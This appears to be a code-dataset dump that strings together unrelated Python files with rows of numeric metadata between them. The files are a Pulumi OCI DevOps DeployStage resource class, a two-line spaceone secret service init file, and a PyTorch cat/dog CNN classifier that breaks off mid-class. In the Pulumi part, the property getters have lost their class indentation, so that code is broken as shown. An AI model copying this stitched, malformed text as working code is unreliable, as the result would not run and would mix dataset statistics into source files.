                       deploy_stage_type: Optional[pulumi.Input[str]] = None,
                       deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
                       description: Optional[pulumi.Input[str]] = None,
                       display_name: Optional[pulumi.Input[str]] = None,
                       docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
                       failure_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']]] = None,
                       freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                       function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
                       function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
                       green_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']]] = None,
                       is_async: Optional[pulumi.Input[bool]] = None,
                       is_validation_enabled: Optional[pulumi.Input[bool]] = None,
                       kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       load_balancer_config: Optional[pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']]] = None,
                       max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
                       namespace: Optional[pulumi.Input[str]] = None,
                       oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
                       rollback_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']]] = None,
                       rollout_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']]] = None,
                       traffic_shift_target: Optional[pulumi.Input[str]] = None,
                       wait_criteria: Optional[pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']]] = None,
                       __props__=None):
        # Normalize and validate resource options before touching properties.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # No opts.id means we are creating a new resource, so the caller
            # must not pass a pre-built __props__ bag.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = DeployStageArgs.__new__(DeployStageArgs)

            __props__.__dict__["approval_policy"] = approval_policy
            __props__.__dict__["blue_backend_ips"] = blue_backend_ips
            __props__.__dict__["compute_instance_group_deploy_environment_id"] = compute_instance_group_deploy_environment_id
            __props__.__dict__["config"] = config
            __props__.__dict__["defined_tags"] = defined_tags
            __props__.__dict__["deploy_artifact_id"] = deploy_artifact_id
            __props__.__dict__["deploy_artifact_ids"] = deploy_artifact_ids
            # Required inputs: enforced only for new resources (not when the
            # engine rehydrates an existing resource identified by opts.urn).
            if deploy_pipeline_id is None and not opts.urn:
                raise TypeError("Missing required property 'deploy_pipeline_id'")
            __props__.__dict__["deploy_pipeline_id"] = deploy_pipeline_id
            if deploy_stage_predecessor_collection is None and not opts.urn:
                raise TypeError("Missing required property 'deploy_stage_predecessor_collection'")
            __props__.__dict__["deploy_stage_predecessor_collection"] = deploy_stage_predecessor_collection
            if deploy_stage_type is None and not opts.urn:
                raise TypeError("Missing required property 'deploy_stage_type'")
            __props__.__dict__["deploy_stage_type"] = deploy_stage_type
            __props__.__dict__["deployment_spec_deploy_artifact_id"] = deployment_spec_deploy_artifact_id
            __props__.__dict__["description"] = description
            __props__.__dict__["display_name"] = display_name
            __props__.__dict__["docker_image_deploy_artifact_id"] = docker_image_deploy_artifact_id
            __props__.__dict__["failure_policy"] = failure_policy
            __props__.__dict__["freeform_tags"] = freeform_tags
            __props__.__dict__["function_deploy_environment_id"] = function_deploy_environment_id
            __props__.__dict__["function_timeout_in_seconds"] = function_timeout_in_seconds
            __props__.__dict__["green_backend_ips"] = green_backend_ips
            __props__.__dict__["is_async"] = is_async
            __props__.__dict__["is_validation_enabled"] = is_validation_enabled
            __props__.__dict__["kubernetes_manifest_deploy_artifact_ids"] = kubernetes_manifest_deploy_artifact_ids
            __props__.__dict__["load_balancer_config"] = load_balancer_config
            __props__.__dict__["max_memory_in_mbs"] = max_memory_in_mbs
            __props__.__dict__["namespace"] = namespace
            __props__.__dict__["oke_cluster_deploy_environment_id"] = oke_cluster_deploy_environment_id
            __props__.__dict__["rollback_policy"] = rollback_policy
            __props__.__dict__["rollout_policy"] = rollout_policy
            __props__.__dict__["traffic_shift_target"] = traffic_shift_target
            __props__.__dict__["wait_criteria"] = wait_criteria
            # Output-only properties: start as None and are populated by the
            # provider after the resource is created.
            __props__.__dict__["compartment_id"] = None
            __props__.__dict__["lifecycle_details"] = None
            __props__.__dict__["project_id"] = None
            __props__.__dict__["state"] = None
            __props__.__dict__["system_tags"] = None
            __props__.__dict__["time_created"] = None
            __props__.__dict__["time_updated"] = None
        # Register the resource under its Pulumi type token.
        super(DeployStage, __self__).__init__(
            'oci:devops/deployStage:DeployStage',
            resource_name,
            __props__,
            opts)
    # Factory that looks up an existing DeployStage by provider ID instead of
    # creating a new one; all state arguments are optional hints.
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            approval_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']]] = None,
            blue_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']]] = None,
            compartment_id: Optional[pulumi.Input[str]] = None,
            compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
            config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
            defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
            deploy_artifact_id: Optional[pulumi.Input[str]] = None,
            deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            deploy_pipeline_id: Optional[pulumi.Input[str]] = None,
            deploy_stage_predecessor_collection: Optional[pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']]] = None,
            deploy_stage_type: Optional[pulumi.Input[str]] = None,
            deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
            description: Optional[pulumi.Input[str]] = None,
            display_name: Optional[pulumi.Input[str]] = None,
            docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
            failure_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']]] = None,
            freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
            function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
            function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
            green_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']]] = None,
            is_async: Optional[pulumi.Input[bool]] = None,
            is_validation_enabled: Optional[pulumi.Input[bool]] = None,
            kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            lifecycle_details: Optional[pulumi.Input[str]] = None,
            load_balancer_config: Optional[pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']]] = None,
            max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
            namespace: Optional[pulumi.Input[str]] = None,
            oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
            project_id: Optional[pulumi.Input[str]] = None,
            rollback_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']]] = None,
            rollout_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']]] = None,
            state: Optional[pulumi.Input[str]] = None,
            system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
            time_created: Optional[pulumi.Input[str]] = None,
            time_updated: Optional[pulumi.Input[str]] = None,
            traffic_shift_target: Optional[pulumi.Input[str]] = None,
            wait_criteria: Optional[pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']]] = None) -> 'DeployStage':
        """
        Get an existing DeployStage resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']] approval_policy: (Updatable) Specifies the approval policy.
        :param pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']] blue_backend_ips: (Updatable) Collection of backend environment IP addresses.
        :param pulumi.Input[str] compartment_id: The OCID of a compartment.
        :param pulumi.Input[str] compute_instance_group_deploy_environment_id: (Updatable) A compute instance group environment OCID for rolling deployment.
        :param pulumi.Input[Mapping[str, Any]] config: (Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
        :param pulumi.Input[str] deploy_artifact_id: (Updatable) Optional binary artifact OCID user may provide to this stage.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] deploy_artifact_ids: (Updatable) Additional file artifact OCIDs.
        :param pulumi.Input[str] deploy_pipeline_id: The OCID of a pipeline.
        :param pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']] deploy_stage_predecessor_collection: (Updatable) Collection containing the predecessors of a stage.
        :param pulumi.Input[str] deploy_stage_type: (Updatable) Deployment stage type.
        :param pulumi.Input[str] deployment_spec_deploy_artifact_id: (Updatable) The OCID of the artifact that contains the deployment specification.
        :param pulumi.Input[str] description: (Updatable) Optional description about the deployment stage.
        :param pulumi.Input[str] display_name: (Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
        :param pulumi.Input[str] docker_image_deploy_artifact_id: (Updatable) A Docker image artifact OCID.
        :param pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']] failure_policy: (Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
        :param pulumi.Input[str] function_deploy_environment_id: (Updatable) Function environment OCID.
        :param pulumi.Input[int] function_timeout_in_seconds: (Updatable) Timeout for execution of the Function. Value in seconds.
        :param pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']] green_backend_ips: (Updatable) Collection of backend environment IP addresses.
        :param pulumi.Input[bool] is_async: (Updatable) A boolean flag specifies whether this stage executes asynchronously.
        :param pulumi.Input[bool] is_validation_enabled: (Updatable) A boolean flag specifies whether the invoked function should be validated.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] kubernetes_manifest_deploy_artifact_ids: (Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
        :param pulumi.Input[str] lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
        :param pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']] load_balancer_config: (Updatable) Specifies config for load balancer traffic shift stages.
        :param pulumi.Input[str] max_memory_in_mbs: (Updatable) Maximum usable memory for the Function (in MB).
        :param pulumi.Input[str] namespace: (Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
        :param pulumi.Input[str] oke_cluster_deploy_environment_id: (Updatable) Kubernetes cluster environment OCID for deployment.
        :param pulumi.Input[str] project_id: The OCID of a project.
        :param pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']] rollback_policy: (Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
        :param pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']] rollout_policy: (Updatable) Description of rollout policy for load balancer traffic shift stage.
        :param pulumi.Input[str] state: The current state of the deployment stage.
        :param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
        :param pulumi.Input[str] time_created: Time the deployment stage was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
        :param pulumi.Input[str] time_updated: Time the deployment stage was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
        :param pulumi.Input[str] traffic_shift_target: (Updatable) Specifies the target or destination backend set.
        :param pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']] wait_criteria: (Updatable) Specifies wait criteria for the Wait stage.
        """
        # Merging id into opts tells the engine to look up an existing
        # resource rather than create one.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        # Build a state bag from whatever hints the caller supplied.
        __props__ = _DeployStageState.__new__(_DeployStageState)

        __props__.__dict__["approval_policy"] = approval_policy
        __props__.__dict__["blue_backend_ips"] = blue_backend_ips
        __props__.__dict__["compartment_id"] = compartment_id
        __props__.__dict__["compute_instance_group_deploy_environment_id"] = compute_instance_group_deploy_environment_id
        __props__.__dict__["config"] = config
        __props__.__dict__["defined_tags"] = defined_tags
        __props__.__dict__["deploy_artifact_id"] = deploy_artifact_id
        __props__.__dict__["deploy_artifact_ids"] = deploy_artifact_ids
        __props__.__dict__["deploy_pipeline_id"] = deploy_pipeline_id
        __props__.__dict__["deploy_stage_predecessor_collection"] = deploy_stage_predecessor_collection
        __props__.__dict__["deploy_stage_type"] = deploy_stage_type
        __props__.__dict__["deployment_spec_deploy_artifact_id"] = deployment_spec_deploy_artifact_id
        __props__.__dict__["description"] = description
        __props__.__dict__["display_name"] = display_name
        __props__.__dict__["docker_image_deploy_artifact_id"] = docker_image_deploy_artifact_id
        __props__.__dict__["failure_policy"] = failure_policy
        __props__.__dict__["freeform_tags"] = freeform_tags
        __props__.__dict__["function_deploy_environment_id"] = function_deploy_environment_id
        __props__.__dict__["function_timeout_in_seconds"] = function_timeout_in_seconds
        __props__.__dict__["green_backend_ips"] = green_backend_ips
        __props__.__dict__["is_async"] = is_async
        __props__.__dict__["is_validation_enabled"] = is_validation_enabled
        __props__.__dict__["kubernetes_manifest_deploy_artifact_ids"] = kubernetes_manifest_deploy_artifact_ids
        __props__.__dict__["lifecycle_details"] = lifecycle_details
        __props__.__dict__["load_balancer_config"] = load_balancer_config
        __props__.__dict__["max_memory_in_mbs"] = max_memory_in_mbs
        __props__.__dict__["namespace"] = namespace
        __props__.__dict__["oke_cluster_deploy_environment_id"] = oke_cluster_deploy_environment_id
        __props__.__dict__["project_id"] = project_id
        __props__.__dict__["rollback_policy"] = rollback_policy
        __props__.__dict__["rollout_policy"] = rollout_policy
        __props__.__dict__["state"] = state
        __props__.__dict__["system_tags"] = system_tags
        __props__.__dict__["time_created"] = time_created
        __props__.__dict__["time_updated"] = time_updated
        __props__.__dict__["traffic_shift_target"] = traffic_shift_target
        __props__.__dict__["wait_criteria"] = wait_criteria
        return DeployStage(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="approvalPolicy")
def approval_policy(self) -> pulumi.Output['outputs.DeployStageApprovalPolicy']:
    """(Updatable) Specifies the approval policy."""
    value = pulumi.get(self, "approval_policy")
    return value
@property
@pulumi.getter(name="blueBackendIps")
def blue_backend_ips(self) -> pulumi.Output['outputs.DeployStageBlueBackendIps']:
    """(Updatable) Collection of backend environment IP addresses."""
    value = pulumi.get(self, "blue_backend_ips")
    return value
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
    """The OCID of a compartment."""
    value = pulumi.get(self, "compartment_id")
    return value
@property
@pulumi.getter(name="computeInstanceGroupDeployEnvironmentId")
def compute_instance_group_deploy_environment_id(self) -> pulumi.Output[str]:
    """(Updatable) A compute instance group environment OCID for rolling deployment."""
    value = pulumi.get(self, "compute_instance_group_deploy_environment_id")
    return value
@property
@pulumi.getter
def config(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
    """(Updatable) User provided key and value pair configuration, which is assigned through constants or parameter."""
    value = pulumi.get(self, "config")
    return value
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
    """(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`"""
    value = pulumi.get(self, "defined_tags")
    return value
@property
@pulumi.getter(name="deployArtifactId")
def deploy_artifact_id(self) -> pulumi.Output[Optional[str]]:
    """(Updatable) Optional binary artifact OCID user may provide to this stage."""
    value = pulumi.get(self, "deploy_artifact_id")
    return value
@property
@pulumi.getter(name="deployArtifactIds")
def deploy_artifact_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
    """(Updatable) Additional file artifact OCIDs."""
    value = pulumi.get(self, "deploy_artifact_ids")
    return value
@property
@pulumi.getter(name="deployPipelineId")
def deploy_pipeline_id(self) -> pulumi.Output[str]:
    """The OCID of a pipeline."""
    value = pulumi.get(self, "deploy_pipeline_id")
    return value
@property
@pulumi.getter(name="deployStagePredecessorCollection")
def deploy_stage_predecessor_collection(self) -> pulumi.Output['outputs.DeployStageDeployStagePredecessorCollection']:
    """(Updatable) Collection containing the predecessors of a stage."""
    value = pulumi.get(self, "deploy_stage_predecessor_collection")
    return value
@property
@pulumi.getter(name="deployStageType")
def deploy_stage_type(self) -> pulumi.Output[str]:
    """(Updatable) Deployment stage type."""
    value = pulumi.get(self, "deploy_stage_type")
    return value
@property
@pulumi.getter(name="deploymentSpecDeployArtifactId")
def deployment_spec_deploy_artifact_id(self) -> pulumi.Output[str]:
    """(Updatable) The OCID of the artifact that contains the deployment specification."""
    value = pulumi.get(self, "deployment_spec_deploy_artifact_id")
    return value
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
    """(Updatable) Optional description about the deployment stage."""
    value = pulumi.get(self, "description")
    return value
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
    """(Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information."""
    value = pulumi.get(self, "display_name")
    return value
@property
@pulumi.getter(name="dockerImageDeployArtifactId")
def docker_image_deploy_artifact_id(self) -> pulumi.Output[str]:
    """(Updatable) A Docker image artifact OCID."""
    value = pulumi.get(self, "docker_image_deploy_artifact_id")
    return value
@property
@pulumi.getter(name="failurePolicy")
def failure_policy(self) -> pulumi.Output['outputs.DeployStageFailurePolicy']:
    """(Updatable) Specifies a failure policy for a compute instance group rolling deployment stage."""
    value = pulumi.get(self, "failure_policy")
    return value
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
    """(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`"""
    value = pulumi.get(self, "freeform_tags")
    return value
@property
@pulumi.getter(name="functionDeployEnvironmentId")
def function_deploy_environment_id(self) -> pulumi.Output[str]:
    """(Updatable) Function environment OCID."""
    value = pulumi.get(self, "function_deploy_environment_id")
    return value
@property
@pulumi.getter(name="functionTimeoutInSeconds")
def function_timeout_in_seconds(self) -> pulumi.Output[int]:
    """(Updatable) Timeout for execution of the Function. Value in seconds."""
    value = pulumi.get(self, "function_timeout_in_seconds")
    return value
@property
@pulumi.getter(name="greenBackendIps")
def green_backend_ips(self) -> pulumi.Output['outputs.DeployStageGreenBackendIps']:
    """(Updatable) Collection of backend environment IP addresses."""
    value = pulumi.get(self, "green_backend_ips")
    return value
@property
@pulumi.getter(name="isAsync")
def is_async(self) -> pulumi.Output[bool]:
    """(Updatable) A boolean flag specifies whether this stage executes asynchronously."""
    value = pulumi.get(self, "is_async")
    return value
@property
@pulumi.getter(name="isValidationEnabled")
def is_validation_enabled(self) -> pulumi.Output[bool]:
    """(Updatable) A boolean flag specifies whether the invoked function should be validated."""
    value = pulumi.get(self, "is_validation_enabled")
    return value
@property
@pulumi.getter(name="kubernetesManifestDeployArtifactIds")
def kubernetes_manifest_deploy_artifact_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
    """(Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource."""
    value = pulumi.get(self, "kubernetes_manifest_deploy_artifact_ids")
    return value
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
    """A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state."""
    value = pulumi.get(self, "lifecycle_details")
    return value
@property
@pulumi.getter(name="loadBalancerConfig")
def load_balancer_config(self) -> pulumi.Output['outputs.DeployStageLoadBalancerConfig']:
    """(Updatable) Specifies config for load balancer traffic shift stages."""
    value = pulumi.get(self, "load_balancer_config")
    return value
@property
@pulumi.getter(name="maxMemoryInMbs")
def max_memory_in_mbs(self) -> pulumi.Output[str]:
    """(Updatable) Maximum usable memory for the Function (in MB)."""
    value = pulumi.get(self, "max_memory_in_mbs")
    return value
@property
@pulumi.getter
def namespace(self) -> pulumi.Output[str]:
    """(Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest."""
    value = pulumi.get(self, "namespace")
    return value
@property
@pulumi.getter(name="okeClusterDeployEnvironmentId")
def oke_cluster_deploy_environment_id(self) -> pulumi.Output[str]:
    """(Updatable) Kubernetes cluster environment OCID for deployment."""
    value = pulumi.get(self, "oke_cluster_deploy_environment_id")
    return value
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
    """The OCID of a project."""
    value = pulumi.get(self, "project_id")
    return value
@property
@pulumi.getter(name="rollbackPolicy")
def rollback_policy(self) -> pulumi.Output['outputs.DeployStageRollbackPolicy']:
    """(Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types."""
    value = pulumi.get(self, "rollback_policy")
    return value
@property
@pulumi.getter(name="rolloutPolicy")
def rollout_policy(self) -> pulumi.Output['outputs.DeployStageRolloutPolicy']:
    """(Updatable) Description of rollout policy for load balancer traffic shift stage."""
    value = pulumi.get(self, "rollout_policy")
    return value
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
    """The current state of the deployment stage."""
    value = pulumi.get(self, "state")
    return value
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> pulumi.Output[Mapping[str, Any]]:
    """Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`"""
    value = pulumi.get(self, "system_tags")
    return value
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
    """Time the deployment stage was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339)."""
    value = pulumi.get(self, "time_created")
    return value
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
    """Time the deployment stage was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339)."""
    value = pulumi.get(self, "time_updated")
    return value
@property
@pulumi.getter(name="trafficShiftTarget")
def traffic_shift_target(self) -> pulumi.Output[str]:
    """(Updatable) Specifies the target or destination backend set."""
    value = pulumi.get(self, "traffic_shift_target")
    return value
@property
@pulumi.getter(name="waitCriteria")
def wait_criteria(self) -> pulumi.Output['outputs.DeployStageWaitCriteria']:
    """(Updatable) Specifies wait criteria for the Wait stage."""
    value = pulumi.get(self, "wait_criteria")
    return value
| 55.647497
| 324
| 0.701175
| 11,787
| 104,506
| 5.918385
| 0.03173
| 0.07285
| 0.078713
| 0.042575
| 0.963518
| 0.953584
| 0.949498
| 0.94613
| 0.942489
| 0.924584
| 0
| 0.000777
| 0.199625
| 104,506
| 1,877
| 325
| 55.677144
| 0.833234
| 0.357635
| 0
| 0.847764
| 1
| 0
| 0.172856
| 0.100899
| 0
| 0
| 0
| 0
| 0
| 1
| 0.169363
| false
| 0.000951
| 0.00666
| 0
| 0.278782
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
596b4b9e69b45f0af8522509673a7b2d1e08f869
| 141
|
py
|
Python
|
src/spaceone/secret/service/__init__.py
|
ku524/secret
|
c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1
|
[
"Apache-2.0"
] | 7
|
2020-06-04T23:01:12.000Z
|
2021-01-31T08:41:29.000Z
|
src/spaceone/secret/service/__init__.py
|
ku524/secret
|
c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1
|
[
"Apache-2.0"
] | 2
|
2020-08-05T13:31:53.000Z
|
2021-03-07T15:15:14.000Z
|
src/spaceone/secret/service/__init__.py
|
ku524/secret
|
c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1
|
[
"Apache-2.0"
] | 6
|
2020-06-10T01:59:35.000Z
|
2021-11-25T06:30:35.000Z
|
from spaceone.secret.service.secret_service import SecretService
from spaceone.secret.service.secret_group_service import SecretGroupService
| 47
| 75
| 0.900709
| 17
| 141
| 7.294118
| 0.470588
| 0.314516
| 0.290323
| 0.403226
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056738
| 141
| 2
| 76
| 70.5
| 0.932331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ab9564cb3f618f9aa7e851b6a19592c683cd2eed
| 11,812
|
py
|
Python
|
Classification/src/network.py
|
Natural-Goldfish/CatDogClassification
|
5ae0fe8bc37c6ee8a1cd3bd75cc862c650822263
|
[
"CECILL-B"
] | null | null | null |
Classification/src/network.py
|
Natural-Goldfish/CatDogClassification
|
5ae0fe8bc37c6ee8a1cd3bd75cc862c650822263
|
[
"CECILL-B"
] | null | null | null |
Classification/src/network.py
|
Natural-Goldfish/CatDogClassification
|
5ae0fe8bc37c6ee8a1cd3bd75cc862c650822263
|
[
"CECILL-B"
] | null | null | null |
import torch
from torchvision.models import vgg16
class CatDogClassifier_2l(torch.nn.Module):
    """Two-conv-block CNN emitting 2 class logits (cat vs. dog).

    The head flattens a 64x28x28 feature map, so the conv/pool stack must
    reduce the input to 28x28 spatially (two /2 max-pools).
    """

    def __init__(self):
        super().__init__()

        def conv_block(in_ch, out_ch):
            # 3x3 conv (stride 1, pad 1, no bias) followed by in-place ReLU.
            return torch.nn.Sequential(
                torch.nn.Conv2d(in_ch, out_ch, 3, 1, 1, bias=False),
                torch.nn.ReLU(inplace=True),
            )

        self.layer1 = conv_block(3, 32)
        self.max_pool1 = torch.nn.MaxPool2d(2, stride=2)
        self.layer2 = conv_block(32, 64)
        self.max_pool2 = torch.nn.MaxPool2d(2, stride=2)
        # Fully connected head: flattened 64x28x28 features -> 2 logits.
        self.classify = torch.nn.Sequential(
            torch.nn.Linear(64 * 28 * 28, 4096),
            torch.nn.ReLU(inplace=True),
            torch.nn.Dropout(0.5),
            torch.nn.Linear(4096, 1024),
            torch.nn.ReLU(inplace=True),
            torch.nn.Linear(1024, 2),
        )

    def forward(self, x):
        """Run conv/pool stages, flatten, and classify."""
        out = self.max_pool1(self.layer1(x))
        out = self.max_pool2(self.layer2(out))
        out = out.view(-1, 64 * 28 * 28)
        return self.classify(out)
class CatDogClassifier_3l(torch.nn.Module):
    """Three-conv-block CNN emitting 2 class logits (cat vs. dog).

    The head flattens a 128x14x14 feature map (three /2 max-pools).
    """

    def __init__(self):
        super().__init__()

        def conv_block(in_ch, out_ch):
            # 3x3 conv (stride 1, pad 1, no bias) followed by in-place ReLU.
            return torch.nn.Sequential(
                torch.nn.Conv2d(in_ch, out_ch, 3, 1, 1, bias=False),
                torch.nn.ReLU(inplace=True),
            )

        self.layer1 = conv_block(3, 32)
        self.max_pool1 = torch.nn.MaxPool2d(2, stride=2)
        self.layer2 = conv_block(32, 64)
        self.max_pool2 = torch.nn.MaxPool2d(2, stride=2)
        self.layer3 = conv_block(64, 128)
        self.max_pool3 = torch.nn.MaxPool2d(2, stride=2)
        # Fully connected head: flattened 128x14x14 features -> 2 logits.
        self.classify = torch.nn.Sequential(
            torch.nn.Linear(128 * 14 * 14, 4096),
            torch.nn.ReLU(inplace=True),
            torch.nn.Dropout(0.5),
            torch.nn.Linear(4096, 1024),
            torch.nn.ReLU(inplace=True),
            torch.nn.Linear(1024, 2),
        )

    def forward(self, x):
        """Run conv/pool stages, flatten, and classify."""
        out = self.max_pool1(self.layer1(x))
        out = self.max_pool2(self.layer2(out))
        out = self.max_pool3(self.layer3(out))
        out = out.view(-1, 128 * 14 * 14)
        return self.classify(out)
class CatDogClassifier_4l(torch.nn.Module):
    """Four-conv-block CNN emitting 2 class logits (cat vs. dog).

    The head flattens a 256x7x7 feature map (four /2 max-pools).
    """

    def __init__(self):
        super().__init__()

        def conv_block(in_ch, out_ch):
            # 3x3 conv (stride 1, pad 1, no bias) followed by in-place ReLU.
            return torch.nn.Sequential(
                torch.nn.Conv2d(in_ch, out_ch, 3, 1, 1, bias=False),
                torch.nn.ReLU(inplace=True),
            )

        self.layer1 = conv_block(3, 32)
        self.max_pool1 = torch.nn.MaxPool2d(2, stride=2)
